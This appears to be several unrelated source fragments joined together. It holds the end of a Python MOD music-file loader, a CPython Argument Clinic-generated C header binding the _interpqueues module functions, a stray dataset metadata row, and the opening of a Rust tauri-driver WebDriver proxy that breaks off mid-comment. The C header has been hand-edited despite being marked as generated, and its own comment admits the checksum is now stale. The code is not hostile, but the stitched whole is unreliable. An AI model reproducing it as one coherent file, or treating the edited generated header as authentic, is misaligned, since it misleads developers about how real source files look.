            self.restartpos = struct.unpack(">B", f.read(1))[0]  # Restart position
            self.orders = list(struct.unpack(">128B", f.read(128)))
            # Fixes for buggy Startrekker MOD's: FLT8 stores pattern indices
            # doubled; an odd order entry means the file is actually 4-channel.
            fixed = 0
            if self.id == 'FLT8':
                for order in self.orders:
                    if order & 1:
                        fixed = 1
                        self.id = 'FLT4'
                        self.tracker = '4 Channel Startrekker (buggy)'
                        self.channelnum = 4
                if not fixed:
                    for num in range(128):
                        self.orders[num] = self.orders[num] >> 1
            self.patternnum = max(self.orders) + 1
            self.tempo = 125
            self.speed = 6
            curpos = f.tell()
            # Testing for WOW files: Mods Grave WOW files carry an 'M.K.'
            # magic but have 8 channels, detected via the total file size.
            if self.id == 'M.K.':
                f.seek(0, 2)
                sampsize = 0
                for num in range(self.samplenum):
                    sampsize = sampsize + self.samples[num].length
                if f.tell() == 2048 * self.patternnum + sampsize + 3132:
                    self.channelnum = 8
                    self.tracker = 'Mods Grave WOW'
            f.seek(curpos)
            if self.id != '????':
                f.seek(4, 1)  # Skip the magic id. . . (old 15-sample files have none)
            self.patterns = []
            if self.patternnum:
                for num in range(self.patternnum):
                    self.patterns.append(MODPattern(f, channels=self.channelnum))
            for num in range(self.samplenum):
                self.samples[num].load(f, 1)  # Loading sample data
            f.close()

    def detect(filename):
        """Return 2 for a definite MOD (magic match), 1 for a plausible one
        (filename convention only), 0 otherwise."""
        f = open(filename, 'rb')
        f.seek(1080)
        magic = struct.unpack(">4s", f.read(4))[0]
        f.close()
        for TYPE in MOD_TYPES:
            if magic == TYPE[0]:
                return 2
        if filename.lower().endswith('.mod') or filename.lower().startswith('mod.'):
            return 1
        else:
            return 0
    detect = staticmethod(detect)
/*[clinic input]
preserve
[clinic start generated code]*/
#if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
# include "pycore_gc.h" // PyGC_Head
# include "pycore_runtime.h" // _Py_ID()
#endif
#include "pycore_abstract.h" // _PyNumber_Index()
#include "pycore_modsupport.h" // _PyArg_UnpackKeywords()
/* NOTE(review): Argument Clinic output (file is marked "preserve") —
 * regenerate with Tools/clinic instead of editing this wrapper by hand. */
PyDoc_STRVAR(_interpqueues_create__doc__,
"create($module, /, maxsize, unboundop=-1, fallback=-1)\n"
"--\n"
"\n"
"Create a new cross-interpreter queue and return its unique generated ID.\n"
"\n"
"It is a new reference as though bind() had been called on the queue.\n"
"The caller is responsible for calling destroy() for the new queue\n"
"before the runtime is finalized.");

#define _INTERPQUEUES_CREATE_METHODDEF    \
    {"create", _PyCFunction_CAST(_interpqueues_create), METH_FASTCALL|METH_KEYWORDS, _interpqueues_create__doc__},

static PyObject *
_interpqueues_create_impl(PyObject *module, Py_ssize_t maxsize,
                          int unboundarg, int fallbackarg);

static PyObject *
_interpqueues_create(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)

    #define NUM_KEYWORDS 3
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(maxsize), &_Py_ID(unboundop), &_Py_ID(fallback), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)

    #else  // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif  // !Py_BUILD_CORE

    static const char * const _keywords[] = {"maxsize", "unboundop", "fallback", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "create",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[3];
    Py_ssize_t noptargs = nargs + (kwnames ? PyTuple_GET_SIZE(kwnames) : 0) - 1;
    Py_ssize_t maxsize;
    int unboundarg = -1;
    int fallbackarg = -1;

    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 3, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    /* maxsize: accept any object implementing __index__. */
    {
        Py_ssize_t ival = -1;
        PyObject *iobj = _PyNumber_Index(args[0]);
        if (iobj != NULL) {
            ival = PyLong_AsSsize_t(iobj);
            Py_DECREF(iobj);
        }
        if (ival == -1 && PyErr_Occurred()) {
            goto exit;
        }
        maxsize = ival;
    }
    if (!noptargs) {
        goto skip_optional_pos;
    }
    if (args[1]) {
        unboundarg = PyLong_AsInt(args[1]);
        if (unboundarg == -1 && PyErr_Occurred()) {
            goto exit;
        }
        if (!--noptargs) {
            goto skip_optional_pos;
        }
    }
    fallbackarg = PyLong_AsInt(args[2]);
    if (fallbackarg == -1 && PyErr_Occurred()) {
        goto exit;
    }
skip_optional_pos:
    return_value = _interpqueues_create_impl(module, maxsize, unboundarg, fallbackarg);

exit:
    return return_value;
}
/* NOTE(review): Argument Clinic output ("preserve") — regenerate, don't hand-edit. */
PyDoc_STRVAR(_interpqueues_destroy__doc__,
"destroy($module, /, qid)\n"
"--\n"
"\n"
"Clear and destroy the queue.\n"
"\n"
"Afterward attempts to use the queue will behave as though it never existed.");

#define _INTERPQUEUES_DESTROY_METHODDEF    \
    {"destroy", _PyCFunction_CAST(_interpqueues_destroy), METH_FASTCALL|METH_KEYWORDS, _interpqueues_destroy__doc__},

static PyObject *
_interpqueues_destroy_impl(PyObject *module, int64_t qid);

static PyObject *
_interpqueues_destroy(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)

    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)

    #else  // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif  // !Py_BUILD_CORE

    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "destroy",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;

    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    /* qid: validated/converted by the module's custom qidarg converter. */
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_destroy_impl(module, qid);

exit:
    return return_value;
}
/* NOTE(review): Argument Clinic output ("preserve") — regenerate, don't hand-edit. */
PyDoc_STRVAR(_interpqueues_list_all__doc__,
"list_all($module, /)\n"
"--\n"
"\n"
"Return the list of ID triples for all queues.\n"
"\n"
"Each ID triple consists of (ID, default unbound op, default fallback).");

#define _INTERPQUEUES_LIST_ALL_METHODDEF    \
    {"list_all", (PyCFunction)_interpqueues_list_all, METH_NOARGS, _interpqueues_list_all__doc__},

static PyObject *
_interpqueues_list_all_impl(PyObject *module);

static PyObject *
_interpqueues_list_all(PyObject *module, PyObject *Py_UNUSED(ignored))
{
    return _interpqueues_list_all_impl(module);
}
/* NOTE(review): Argument Clinic output ("preserve") — regenerate, don't hand-edit. */
PyDoc_STRVAR(_interpqueues_put__doc__,
"put($module, /, qid, obj, unboundop=-1, fallback=-1)\n"
"--\n"
"\n"
"Add the object\'s data to the queue.");

#define _INTERPQUEUES_PUT_METHODDEF    \
    {"put", _PyCFunction_CAST(_interpqueues_put), METH_FASTCALL|METH_KEYWORDS, _interpqueues_put__doc__},

static PyObject *
_interpqueues_put_impl(PyObject *module, int64_t qid, PyObject *obj,
                       int unboundarg, int fallbackarg);

static PyObject *
_interpqueues_put(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)

    #define NUM_KEYWORDS 4
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), &_Py_ID(obj), &_Py_ID(unboundop), &_Py_ID(fallback), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)

    #else  // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif  // !Py_BUILD_CORE

    static const char * const _keywords[] = {"qid", "obj", "unboundop", "fallback", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "put",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[4];
    Py_ssize_t noptargs = nargs + (kwnames ? PyTuple_GET_SIZE(kwnames) : 0) - 2;
    int64_t qid;
    PyObject *obj;
    int unboundarg = -1;
    int fallbackarg = -1;

    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 2, /*maxpos*/ 4, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    obj = args[1];
    if (!noptargs) {
        goto skip_optional_pos;
    }
    if (args[2]) {
        unboundarg = PyLong_AsInt(args[2]);
        if (unboundarg == -1 && PyErr_Occurred()) {
            goto exit;
        }
        if (!--noptargs) {
            goto skip_optional_pos;
        }
    }
    fallbackarg = PyLong_AsInt(args[3]);
    if (fallbackarg == -1 && PyErr_Occurred()) {
        goto exit;
    }
skip_optional_pos:
    return_value = _interpqueues_put_impl(module, qid, obj, unboundarg, fallbackarg);

exit:
    return return_value;
}
/* NOTE(review): Argument Clinic output ("preserve") — regenerate, don't hand-edit. */
PyDoc_STRVAR(_interpqueues_get__doc__,
"get($module, /, qid)\n"
"--\n"
"\n"
"Return the (object, unbound op) from the front of the queue.\n"
"\n"
"If there is nothing to receive then raise QueueEmpty.");

#define _INTERPQUEUES_GET_METHODDEF    \
    {"get", _PyCFunction_CAST(_interpqueues_get), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get__doc__},

static PyObject *
_interpqueues_get_impl(PyObject *module, int64_t qid);

static PyObject *
_interpqueues_get(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)

    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)

    #else  // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif  // !Py_BUILD_CORE

    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "get",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;

    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_get_impl(module, qid);

exit:
    return return_value;
}
/* NOTE(review): Argument Clinic output ("preserve") — regenerate, don't hand-edit. */
PyDoc_STRVAR(_interpqueues_bind__doc__,
"bind($module, /, qid)\n"
"--\n"
"\n"
"Take a reference to the identified queue.\n"
"\n"
"The queue is not destroyed until there are no references left.");

#define _INTERPQUEUES_BIND_METHODDEF    \
    {"bind", _PyCFunction_CAST(_interpqueues_bind), METH_FASTCALL|METH_KEYWORDS, _interpqueues_bind__doc__},

static PyObject *
_interpqueues_bind_impl(PyObject *module, int64_t qid);

static PyObject *
_interpqueues_bind(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)

    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)

    #else  // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif  // !Py_BUILD_CORE

    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "bind",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;

    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_bind_impl(module, qid);

exit:
    return return_value;
}
/* NOTE(review): Argument Clinic output ("preserve") — regenerate, don't hand-edit. */
PyDoc_STRVAR(_interpqueues_release__doc__,
"release($module, /, qid)\n"
"--\n"
"\n"
"Release a reference to the queue.\n"
"\n"
"The queue is destroyed once there are no references left.");

#define _INTERPQUEUES_RELEASE_METHODDEF    \
    {"release", _PyCFunction_CAST(_interpqueues_release), METH_FASTCALL|METH_KEYWORDS, _interpqueues_release__doc__},

static PyObject *
_interpqueues_release_impl(PyObject *module, int64_t qid);

static PyObject *
_interpqueues_release(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)

    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)

    #else  // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif  // !Py_BUILD_CORE

    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "release",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;

    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_release_impl(module, qid);

exit:
    return return_value;
}
/*
 * Argument Clinic generated binding for _interpqueues.get_maxsize(qid).
 * Parses "qid" via qidarg_converter() and calls
 * _interpqueues_get_maxsize_impl().
 */
PyDoc_STRVAR(_interpqueues_get_maxsize__doc__,
"get_maxsize($module, /, qid)\n"
"--\n"
"\n"
"Return the maximum number of items in the queue.");
#define _INTERPQUEUES_GET_MAXSIZE_METHODDEF    \
    {"get_maxsize", _PyCFunction_CAST(_interpqueues_get_maxsize), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get_maxsize__doc__},
static PyObject *
_interpqueues_get_maxsize_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_get_maxsize(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    /* Statically allocated keyword tuple; core builds only. */
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)
    #else // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif // !Py_BUILD_CORE
    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "get_maxsize",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;
    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    /* qidarg_converter() sets an exception on failure. */
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_get_maxsize_impl(module, qid);
exit:
    return return_value;
}
/*
 * Argument Clinic generated binding for
 * _interpqueues.get_queue_defaults(qid); parses "qid" and calls
 * _interpqueues_get_queue_defaults_impl().
 */
PyDoc_STRVAR(_interpqueues_get_queue_defaults__doc__,
"get_queue_defaults($module, /, qid)\n"
"--\n"
"\n"
"Return the queue\'s default values, set when it was created.");
#define _INTERPQUEUES_GET_QUEUE_DEFAULTS_METHODDEF    \
    {"get_queue_defaults", _PyCFunction_CAST(_interpqueues_get_queue_defaults), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get_queue_defaults__doc__},
static PyObject *
_interpqueues_get_queue_defaults_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_get_queue_defaults(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    /* Statically allocated keyword tuple; core builds only. */
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)
    #else // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif // !Py_BUILD_CORE
    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "get_queue_defaults",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;
    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    /* qidarg_converter() sets an exception on failure. */
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_get_queue_defaults_impl(module, qid);
exit:
    return return_value;
}
/*
 * Argument Clinic generated binding for _interpqueues.is_full(qid).
 * Parses "qid" via qidarg_converter() and calls
 * _interpqueues_is_full_impl().
 */
PyDoc_STRVAR(_interpqueues_is_full__doc__,
"is_full($module, /, qid)\n"
"--\n"
"\n"
"Return true if the queue has a maxsize and has reached it.");
#define _INTERPQUEUES_IS_FULL_METHODDEF    \
    {"is_full", _PyCFunction_CAST(_interpqueues_is_full), METH_FASTCALL|METH_KEYWORDS, _interpqueues_is_full__doc__},
static PyObject *
_interpqueues_is_full_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_is_full(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    /* Statically allocated keyword tuple; core builds only. */
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)
    #else // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif // !Py_BUILD_CORE
    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "is_full",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;
    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    /* qidarg_converter() sets an exception on failure. */
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_is_full_impl(module, qid);
exit:
    return return_value;
}
/*
 * Argument Clinic generated binding for _interpqueues.get_count(qid).
 * Parses "qid" via qidarg_converter() and calls
 * _interpqueues_get_count_impl().
 */
PyDoc_STRVAR(_interpqueues_get_count__doc__,
"get_count($module, /, qid)\n"
"--\n"
"\n"
"Return the number of items in the queue.");
#define _INTERPQUEUES_GET_COUNT_METHODDEF    \
    {"get_count", _PyCFunction_CAST(_interpqueues_get_count), METH_FASTCALL|METH_KEYWORDS, _interpqueues_get_count__doc__},
static PyObject *
_interpqueues_get_count_impl(PyObject *module, int64_t qid);
static PyObject *
_interpqueues_get_count(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    /* Statically allocated keyword tuple; core builds only. */
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
    #define NUM_KEYWORDS 1
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(qid), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)
    #else // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif // !Py_BUILD_CORE
    static const char * const _keywords[] = {"qid", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "get_count",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[1];
    int64_t qid;
    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 1, /*maxpos*/ 1, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    /* qidarg_converter() sets an exception on failure. */
    if (!qidarg_converter(args[0], &qid)) {
        goto exit;
    }
    return_value = _interpqueues_get_count_impl(module, qid);
exit:
    return return_value;
}
/*
 * Argument Clinic generated binding for
 * _interpqueues._register_heap_types(queuetype, emptyerror, fullerror).
 *
 * Fix: the docstring previously read "Return the number of items in the
 * queue." -- a copy/paste of get_count's docstring that did not describe
 * this function. Since this file is clinic-generated, the same fix must
 * also be applied to the clinic input block in the module's .c file and
 * the code regenerated (the end-of-file checksum is stale otherwise).
 */
PyDoc_STRVAR(_interpqueues__register_heap_types__doc__,
"_register_heap_types($module, /, queuetype, emptyerror, fullerror)\n"
"--\n"
"\n"
"Register the queue type and the empty/full exception types used by the module.");
#define _INTERPQUEUES__REGISTER_HEAP_TYPES_METHODDEF    \
    {"_register_heap_types", _PyCFunction_CAST(_interpqueues__register_heap_types), METH_FASTCALL|METH_KEYWORDS, _interpqueues__register_heap_types__doc__},
static PyObject *
_interpqueues__register_heap_types_impl(PyObject *module,
                                        PyTypeObject *queuetype,
                                        PyObject *emptyerror,
                                        PyObject *fullerror);
static PyObject *
_interpqueues__register_heap_types(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *return_value = NULL;
    /* Statically allocated keyword tuple; core builds only. */
    #if defined(Py_BUILD_CORE) && !defined(Py_BUILD_CORE_MODULE)
    #define NUM_KEYWORDS 3
    static struct {
        PyGC_Head _this_is_not_used;
        PyObject_VAR_HEAD
        Py_hash_t ob_hash;
        PyObject *ob_item[NUM_KEYWORDS];
    } _kwtuple = {
        .ob_base = PyVarObject_HEAD_INIT(&PyTuple_Type, NUM_KEYWORDS)
        .ob_hash = -1,
        .ob_item = { &_Py_ID(queuetype), &_Py_ID(emptyerror), &_Py_ID(fullerror), },
    };
    #undef NUM_KEYWORDS
    #define KWTUPLE (&_kwtuple.ob_base.ob_base)
    #else // !Py_BUILD_CORE
    #  define KWTUPLE NULL
    #endif // !Py_BUILD_CORE
    static const char * const _keywords[] = {"queuetype", "emptyerror", "fullerror", NULL};
    static _PyArg_Parser _parser = {
        .keywords = _keywords,
        .fname = "_register_heap_types",
        .kwtuple = KWTUPLE,
    };
    #undef KWTUPLE
    PyObject *argsbuf[3];
    PyTypeObject *queuetype;
    PyObject *emptyerror;
    PyObject *fullerror;
    args = _PyArg_UnpackKeywords(args, nargs, NULL, kwnames, &_parser,
            /*minpos*/ 3, /*maxpos*/ 3, /*minkw*/ 0, /*varpos*/ 0, argsbuf);
    if (!args) {
        goto exit;
    }
    /* queuetype must be a type object; the other two are taken as-is. */
    if (!PyObject_TypeCheck(args[0], &PyType_Type)) {
        _PyArg_BadArgument("_register_heap_types", "argument 'queuetype'", (&PyType_Type)->tp_name, args[0]);
        goto exit;
    }
    queuetype = (PyTypeObject *)args[0];
    emptyerror = args[1];
    fullerror = args[2];
    return_value = _interpqueues__register_heap_types_impl(module, queuetype, emptyerror, fullerror);
exit:
    return return_value;
}
/*[clinic end generated code: output=64cea8e1063429b6 input=a9049054013a1b77]*/ | c | github | https://github.com/python/cpython | Modules/clinic/_interpqueuesmodule.c.h |
// Copyright 2019-2024 Tauri Programme within The Commons Conservancy
// SPDX-License-Identifier: Apache-2.0
// SPDX-License-Identifier: MIT
use crate::cli::Args;
use anyhow::Error;
use futures_util::TryFutureExt;
use http_body_util::{BodyExt, Full};
use hyper::{
body::{Bytes, Incoming},
header::CONTENT_LENGTH,
http::uri::Authority,
service::service_fn,
Method, Request, Response,
};
use hyper_util::{
client::legacy::{connect::HttpConnector, Client},
rt::{TokioExecutor, TokioIo},
server::conn::auto,
};
use serde::Deserialize;
use serde_json::{json, Map, Value};
use std::path::PathBuf;
use std::process::Child;
use tokio::net::TcpListener;
/// Capability key under which WebDriver clients pass tauri-specific options.
const TAURI_OPTIONS: &str = "tauri:options";
/// Options deserialized from the `tauri:options` capability object.
#[derive(Debug, Deserialize)]
#[serde(rename_all = "camelCase")]
struct TauriOptions {
    /// Path to the Tauri application binary under test.
    application: PathBuf,
    /// Extra command-line arguments passed to the application.
    #[serde(default)]
    args: Vec<String>,
    /// Windows-only: raw `webviewOptions` object forwarded to the driver.
    #[cfg(target_os = "windows")]
    #[serde(default)]
    webview_options: Option<Value>,
}
impl TauriOptions {
    /// Convert the options into `webkitgtk:browserOptions` capabilities for
    /// WebKitWebDriver on Linux (binary path + args).
    #[cfg(target_os = "linux")]
    fn into_native_object(self) -> Map<String, Value> {
        let mut map = Map::new();
        map.insert(
            "webkitgtk:browserOptions".into(),
            json!({"binary": self.application, "args": self.args}),
        );
        map
    }
    /// Convert the options into `ms:edgeOptions` capabilities for
    /// msedgedriver / WebView2 on Windows. Note the application path gets an
    /// `.exe` extension appended, and any `webview_options` are forwarded
    /// under `webviewOptions`.
    #[cfg(target_os = "windows")]
    fn into_native_object(self) -> Map<String, Value> {
        let mut ms_edge_options = Map::new();
        ms_edge_options.insert(
            "binary".into(),
            json!(self.application.with_extension("exe")),
        );
        ms_edge_options.insert("args".into(), self.args.into());
        if let Some(webview_options) = self.webview_options {
            ms_edge_options.insert("webviewOptions".into(), webview_options);
        }
        let mut map = Map::new();
        map.insert("ms:edgeChromium".into(), json!(true));
        map.insert("browserName".into(), json!("webview2"));
        map.insert("ms:edgeOptions".into(), ms_edge_options.into());
        map
    }
}
/// Proxy one incoming WebDriver request to the native driver.
///
/// A `POST /session` body is parsed as JSON and its `tauri:options`
/// capability is rewritten into the native driver's format (see
/// `map_capabilities`); every other request is forwarded with its body
/// unchanged. The rewritten request is then re-targeted at the native
